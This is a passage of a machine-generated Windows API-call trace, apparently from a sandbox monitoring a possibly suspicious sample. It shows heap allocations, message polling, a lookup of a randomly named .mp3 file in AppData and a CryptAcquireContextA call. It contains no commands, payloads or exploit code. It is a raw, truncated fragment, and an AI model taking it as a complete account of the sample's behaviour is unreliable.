(in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0231.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.594] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GxeLAc.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b432e0, ftCreationTime.dwHighDateTime=0x1d5ebc4, ftLastAccessTime.dwLowDateTime=0x176d6600, ftLastAccessTime.dwHighDateTime=0x1d5ef08, ftLastWriteTime.dwLowDateTime=0x176d6600, ftLastWriteTime.dwHighDateTime=0x1d5ef08, nFileSizeHigh=0x0, nFileSizeLow=0x2a33, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="GxeLAc.mp3", cAlternateFileName="")) returned 0xa87550 [0231.594] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0231.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.595] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0231.595] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0231.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.596] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0231.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0231.596] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0231.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0231.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.598] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0231.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0231.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0231.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0231.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0231.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0231.604] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0231.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.604] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0231.605] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: 